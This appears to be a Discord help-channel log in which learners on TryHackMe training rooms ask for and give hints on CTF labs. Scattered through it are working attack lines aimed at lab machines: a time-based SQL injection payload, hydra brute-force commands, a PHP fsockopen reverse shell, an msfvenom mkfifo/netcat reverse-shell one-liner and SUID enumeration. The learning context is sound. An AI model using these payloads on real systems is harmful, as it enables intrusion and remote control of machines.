task 3.3 I tried three hash but i can't get the ans. can i dm you for a hash check?
no dm please
I cant enter this room at the moment. Please wait for someone who can who wants to assist you
3.3 is which question in that screenshot?
the first
did you follow the questions instruction ( go to virustotal? )
what does the hint reveal
I'm not in the room so I can only give some basic blind suggestions
thanks
did you get it or?
not yet
Hi, first time here, and I try to do the room Vulnversity, the Task is want me to find version of squid proxy version and the port server is running on. My problem is after nmap there is no port running for squid and port 3333(which is the port server should running on) and I try to open with the IP on browser, there is error response 405 method not allowed. I try to ask is this room dead?
can u show your nmap result?
!docs verify
verify to send screenshot
Nmap scan report for ec2-34-249-229-192.eu-west-1.compute.amazonaws.com (34.249.229.192)
Host is up (0.20s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp filtered smtp
80/tcp open http WebSockify Python/3.6.9
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp filtered microsoft-ds
3389/tcp open ms-wbt-server xrdp
5901/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
7777/tcp open cbt?
7778/tcp open interwise?
screenshot here
why do u scan 34.249.229.192?
I use my own laptop scan the public ip of that attack box
the result is same when I use the split view on website
I want to give more try but the split view is tooooo slow and I switch
do this room first
ok let me take look first, any way thank you for help
In the Intro to Scripting room it asks what the data type for the payload should be? I can't find the right answer anywhere... what is it asking for?
Which room?
Oh I haven't done that one.
I have tried all the 'data types' that I thought would make sense but none of them are the answer
I suspect this will be either kind of dumb or a "DOH!" moment yup... DOH!
How to solve windows local persistent room
I followed the instructions but I can't get the third flag. When I rdp it says access denied
Rid hijacking
Morning All
Anyone do the 'brute force heroes' room lately? I'm stuck on task 5 (bruteforce password with patator) .. I have patator doing the bruteforce & tried a couple of different password lists (including the passwords.txt provided with the room) but haven't had success as of yet
Figured it out.
Can anyone give me a hint for the SQL injection module? Basically I'm at the SLEEP injection step, and here's what I'm trying to do: ||referrer=useeer' UNION SELECT SLEEP(5),2 FROM users WHERE id = '1' AND password = '%';-- - || The request doesn't wait for 5 seconds before being performed so I assume something must be wrong, but what? How is it possible to guess the password if I can't use the || % || character?
what room is this one?
ty
No problem
just waiting for the attackbox to boot
I'm pretty sure I can see what's wrong with it but I wanna double check
This is much appreciated
Well, that's what this channel is for
@white salmon Sorry I went afk for a second, the statement is almost correct, check your column names.
I had to go make a coffee haha
It's alright, I hope you have a nice meal, so that's just about the column names?
id seems to be fine since the request waits for 5 seconds, so it must be the password one I'm wrong about
So I checked my column names and both seem to be right, which is why it's odd, but when I do the following it does wait for five seconds: || AND password != "%" ||
So I guess the issue is || % || is being counted as a character of the password
Have a look back at the boolean based sqli.
it's no bother at all
again, we're here to help.
well, it's hints after all, not answers
Yeah I figured out I had to use || LIKE || instead of || = ||
mmhm
+rep @dusk imp
Gave +1 Rep to @dusk imp
+rep @dusk imp (Didn't know we could do this)
Gave +1 Rep to @dusk imp
You're welcome, you were very helpful
I just got the flag, thank you unreal
Is it right : crunch 5 5 -t "THM@!" -o tryhackme.txt
If it is why it shows error?
Im in the "Blaster" room, Task 3. I'm stuck trying to find the correct cve. I've watched the walk through video. No history in the target machine web browser. Tried searchsploit and google (iis 10). could not find the cve they are looking for. any body got a suggestion what to search for next.
hey im in linux fund. stuck in http-server mission. can anyone help?
what's the problem you are encountering?
first of all thanks for answer quickly
so im trying to use http server to copy some file. and when i write from another terminal : wget XXX..., its says the file not found
so i try to find it by find command, and it says i have no permision
What's the exact command you did? Where is the file located?
Sorry, I don't have long also. I have to leave in a few minutes
im not sure where is it
Do you have a link to the room you are working on?
For this room, there's walkthrough video. Have you checked it out?
If ever, have you started the target machine?
Are you using your VPN or the attack box?
i did already, i think when they took the video the mission was a little bit diffrent
i use attack box
and i cant find the .flag.txt file for copying
what's the command you did? Can you provide a screenshot?
yes, can i DM you please?
Sorry, no. I have to go also.
If ever, you need to verify so you can post screenshots
!docs verify
follow the steps there
ok thanks
give task #3 section a read again
@rose jewel let's talk in here.
ok so i have 1 tunnel inteface tun0
and i have checked room write ups my way is correct but the web server have issues with opening certain directories
sudo ip link set dev tun0 mtu 1200
Try that in a separate terminal.
+rep @lucid junco
Gave +1 Rep to @lucid junco
for the question "Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?", when i do this i dont see a flag, any hints?
Can you share room link please?
its the second task thing
last question
Copy the MAC Addr. of alice and paste that into Bob's MAC addr. and request site
hi
Need help out
red team room task 6
What syntax would you use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?
link to said room???
yeah think so too scrubs but they seem confused
Hello hackers, I'm in the room Intro to LAN right now and on the section for ARP Protocol > questions, one of them asks; What category of ARP Packet asks a device whether or not it has a specific IP address?
From what I can tell, the answer is "ARP request." No?
It says incorrect answer.
Ah, thanks!
Anyone have any words of advice on what I'm doing wrong when trying to copy a SSH Private key? I keep getting "error in libcrypto" when trying to login with it. I've made sure there are no extra spaces or characters before or after the begin or end
nevermind, just found my issue haha
I have finally been able to login with a username starting with 'a' in the Looking Glass room but cant find anything that points me where to go from here. Any hints available that someone can share?
what task are u trying to get next?
block logs are located in Microsoft/Windows/PowerShell/Operational or Microsoft-Windows-PowerShell
why i cant locate the blocks?
Which evasion technique involves burning compute-time to escape the sandbox?
take a look at task #3, one of the techniques discusses using compute-time as a sandbox evasion method
Im trying to get the root flag
Going thru nearly every link in hacktricks I was finally able to figure it out. Man that was difficult.
because it's not a normal sudo -l like it usually be, i only know how to change host with sudo from write up as well
Ive used the host parameter with sudo before but I didnt think at all to look in to sudoers... I dont think I ever would have thought about that if I didnt see it mentioned on hacktricks
yea when i was doing it, i tried to do sudo -l but it needs pw lol
That was one of the first things I tried too
And then linpeas of course which showed me nothing. I then spent hours just trying to look around the system. Epic fail there too.
when im too stuck, write up can help
just to know what to do next
Definitely. Im new to thm so Im trying to do these without writeups
i'm trying to learn so reading write up isn't too bad
Not at all
apparently write up can actually point out new technique to solve
always a good idea to read it after if u insist to not use it while doing the box
Thats a great point. I should go thru some writeups and see what other people did
yea maybe we haven't went through the rabbit hole and the way of getting out of it
Im working on the Mr Robot ctf right now. Need 3rd flag
linpeas for the win on that one
u can just do manual enum for it
find / -perm /4000 2>/dev/null and look at the unusual one
Good idea. Linpeas is a goto for me so I automatically used it. I like your way for when Im unable to upload anything
Thank you @languid isle
Gave +1 Rep to @languid isle
Im working on the tomghost machine but getting a secret key not available error when decrypting the pgp file. Is this expected?
Ive also tried specifying the .asc file and get the same error
Ah... documentation says I need to import the key file first. nvm
hey guys i'm having trouble with the room password attacks in task 8 can i have some help?
last 3 flags of task 8 of room passwords attacks
yes sorry. @burnt rivet
so for task8 second question i used this command: hydra -l pittman@clinic.thmredteam.com -P wordlist.lst smtp://10.10.58.130:25 -v
where wordlist.lst is a dictionary based file made with john with this rule: Az" [0-9][0-9]" ^[!@]
using this command: john --wordlist=clinic.lst --rules=thm-passoword-attacks --stdout>wordlist.lst
where clinic.lst is a file that i got with this command: cewl https://clinic.thmredteam.com -m 8 -d 5 -w clinic.lst
The official website of Elite Medical
but when i run hydra i keep getting this error [ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server
Obfuscation Principles
Task 5
What obfuscation layer aims to confuse an analyst by manipulating the code flow and abstract syntax trees?
Can i get a tip as really struggling with this, have tried everything i think it can be and have tried everything.
@coral girder its written in plain english on the page.
keep trying things. keep in mind it is asking for the name of a whole layer.
Honestly think ive tried everything on page lol
@coral girder I promise you haven't because the answer is literally on the page. A layer encompasses more than one principle in this case. Find something that encompasses smaller principles.
Thank you, its always easy when you know haha thanks for the help.
I am working on the nax room and am stuck trying to get some data from a website in the image I found for question 1. The site BertNase site says my image does not have any data. Can someone help push me in the correct direction on why that might be? Ive downloaded it multiple times...
Got it... nvm
Does anyone know what happens with of the webshell of persisting through existing services? In Windows local persistence
Hello I need help to answer this questions task 4 Active directory basics
Actually I just donot know how to log in to another user account
I even do not know how to connect via RDP
what is that
remote desktop applications that you would use to connect to the box
Ok but I have no idea how to do it , is there any link or reference to show me how
for xfreerdp -> https://miloserdov.org/?p=4516
Ok I will try … thank you
Gave +1 Rep to @spare ibex
In windowsapi room...and the question is what type of method is used to reference the API call to obtain a struct?
hi guys can anyone help me out with hydra
i want to brute force a login form
hydra -t 1 -V -f -l milesdyson -P passwords 10.10.38.225/squirrelmail/src/login.php http-form-post
but its not working following error
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: (null)
wait where
did it with burp suite
oh damn thought
hydra just takes the username and the specified passwordlist and enters it in the form
Hi guys
sitting on the room skynet and i try to use the php reverse shell
<?php
system('php -r '$sock=fsockopen("10.10.95.57",4444);exec("/bin/sh -i <&5 >&5 2>&5");'')
?>
is this valid?
would think you would need a bigger file than that for a php reverse shell but could be wrong
yuup shadow is wrong according to the options from 0day:s revshells.com
That's a really weird way to use the php reverse shell payload given you already have PHP code execution between <?php ?> tags
hi guys! is still working CTF "hacker vs hacker"?? i found the lachlan ssh key and can't get into it, with the key 'nthisis........'
Hi guys, I am new in CyberSec, I am trying doing telnet exploiting in network service room on THM. I am just wondering why trying connect with netcat like ".RUN nc [my machine ip] [port] and my machine is listening on that port, my machine comes up with connected with the target machine msg , but when Im tryin some command there is no output. But I try to .RUN a payload generated by msfvenom reverse_netcat, it works fine. Thank you in advance
Hello im doing the room vulnversity, and im trying to get a root shell by abusing /bin/systemctl SUID permisions but the hint i need is netcat is giving me this
listening on [any] 8080 ...
10.10.65.223: inverse host lookup failed: Unknown host
connect to [10.13.48.58] from (UNKNOWN) [10.10.65.223] 51070
/bin/sh: 0: can't access tty; job control turned off
Boxes ip mine is 10.13.48.58
For reverse shells, I recommend using https://www.revshells.com/
And for PHP reverse shells, I always use PentestMonkey's PHP reverse shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Just change the IP on line 49 and the port on line 50 and you're good to go
you mean when my two machines connected by nc successfully, it is not a shell and can not exe cmds and when i use msfvenom to create a reverse_netcat it will give me a shell to execute command. Am I understand right?
thanks sir
Gave +1 Rep to @burnt rivet
for the mr robot ctf, is there any way of making the process of bruteforcing the password faster cuz its will take like half an hour for hydra to run through the whole list
I think if you add -f it should stop when it's found the correct password.
With the exception of Juice shop, most, if not all, passwords should be brute-forced in 5 min(s)
i added the "your password is incorrect" thing in the command for it to know when to stop
||hydra -V -l Elliot -P fsocity.dic 10.10.157.77 http-post-form "/wp-admin.php:log=^USER^&pwd=^PASS^&wp-submit=Log+ In: password you entered"||
thats the full command
Use wpscan
Hope it helps...
Whats wrong with this: crunch 5 5 -t THM@! -o tryhackme.txt, room: https://tryhackme.com/room/passwordattacks task 4 last question
So like they are not always the same? Or
I am looking at the man page I believe I am getting it, just not sure what the other character is
Where does it say '!' is a special character ? Or?
Damn, I am clearly missing something here. So ! is a special character however, its not in the list of special patterns
Yes I don't see "!"
Okay, Yes thats why I thought this would be Right, crunch 5 5 -t THM@! -o tryhackme.txt.
ah another person having problem with that part of password attacks
good old classic at this point
crunch 5 5 -t THM%% -o tryhackme.txt
crunch 5 5 -t THM^^ -o tryhackme.txt ?
Lol, thanks
YAY you got the answer
I see the problem is with understanding the question. Since I instantly thought 'THM@!' was the pattern it wanted me to use
yeah the english for the question might need some simplification.... but dunno about how to get that done
Perhaps just emphasise it, like saying create a crunch command that will contain THM@! and THM!!
good evening, needing a little nudge for crypto 101
Please be more specific. People can't offer help until they know what you need a nudge on
task 9, trying to import the file into the attack box
i tried using google drive but my credentials dont work in the attack box
im sorry task 11
gpg.zip
mkfifo /tmp/orapl; nc [ip][port] 0 < /tmp/orapl | /bin/sh > /tmp/orapl 2>&1; rm /tmp/orapl
This is the payload generated by msfvenom. Im trying to understand how it really works.
My local machine is listening on the port. The thing is what the diff between (nc [ip][port] 0 < /tmp/orapl | /bin/sh > /tmp/orapl 2>&1) and (nc [ip][port] 0 < /tmp/orapl; /bin/sh > /tmp/orapl 2>&1) when i try replace the " | " pipe with colon the target machine and my machine still connect but seem like I can't get the shell from the target machine
Your google drive creds will work, assuming you're a subscriber
Those are all wrong. You shouldn't have [][] in there
no just replace for the real ip and port
i am a subscriber however the the room im in being done through school so i dont think my creds will work
That doesn't change the attackbox.
it works fine just try to replace | with ; to figure how the command works
So you broke the command and you're wondering why it no longer works?
I'd focus on understanding the command first
And this isn't a room hints related issue, please use #infosec-general
oh sure, i will move to that, just try to understand the network service room. Sorry for this mistake
@stuck fractal i will work on trying import however i do have another question on task 9
i ran 2 different ways and i still came up with the same answer of mango
Please follow these steps, to allow you to post images.
Once you've done that, please post a screenshot of what you're doing.
Hi guys I'm just a noob and got stuck in **simple ctf** not able to download the file from ftp server please look into it and suggest me something.
!docs verify
Verify yourself and show screenshot of your command
Hello guys, i'm doing chill machine and when i retrieve the correct password for user "anurodh", i get an "authentication failure" even tho it's the correct password (got it from the source_code.php). I've done some research and this isn't happening for people retrieving the same password. Is something there i'm missing? Any help would be nice
Please can you share link of the room?
Did you try to bruteforce dir?
no
ls -lah to see files on the ftp server
mget filename to download file from ftp server
please do enumeration more
i only brute force zip file for the source_code.php
which give me the password encoded in base64
You have foothold? Can you tell me how far you are?
Try to switch user with that decoded pass
it doesn't work
i try to put random pass like 12345, which is not the password, and it says "Authentication failure"
like with the correct one
Make sure it only contains password not blank spaces
ok that was it, for some reason i was copying the pass with a blank space at the end, cuz i delete 1 char when ctrl+v and i get to the user, ty man for ur time, appreciate it!
You got that user?
ye i got to anurodh
@cold eagle thanks man, its solved
Gave +1 Rep to @cold eagle
Hello I'm having trouble with subdomainenumeration task 6. I looked and previous students had trouble as well. For the Machine IP portion of the command you're supposed to put the IP of the target machine... but I don't know where to find that
here is an example of where to see the target machine ip... this box will pop up after you hit the green start machine button in a task with a green box kinda thingy in the right part of the task description
Is there anyway to see it after that? I don't see anything like that on the page
Nevermind, found it
It's hidden in Task 1 -_-
yuups and that is kinda common
that the start machine button is in the first task for a room
Noted! Thanks so much for the assistance!
Gave +1 Rep to @alpine kestrel
Windows Defender Antivirus is configured to exclude a particular extension from scanning. What is the extension?
windows hardening task 5
search in the Virus and Threat protection settings for extensions
guys
heya need a mental push to make me remember how im supposed to do this
im doing the linux priv esc room in jr pentesting
and need to copy both /etc/shadow and etc/passwd
but how would i go about copying it from target machine to local machine?
its for task 7
yeah but when i tried it with attackbox/targetbox combo i couldnt seem to copy it
now im trying it with a local kali boot and only target so maybe that makes a difference
alright
still doesnt wanna copy, right click, ctrl+c and ctrl+ins dont work
god, im going to blame this on it still being early here
XD
thanks
Considering your previous screenshot, you are using the wrong IP
Doesn't matter, in the previous screenshot it showed your tun0 IP
or is that the ip of the target box
And since you want to catch the connection on your attacking machine, you are using the wrong IP
Not sure what IP it is, you should know that
But at least it's not the IP you want to catch the shell on I assume
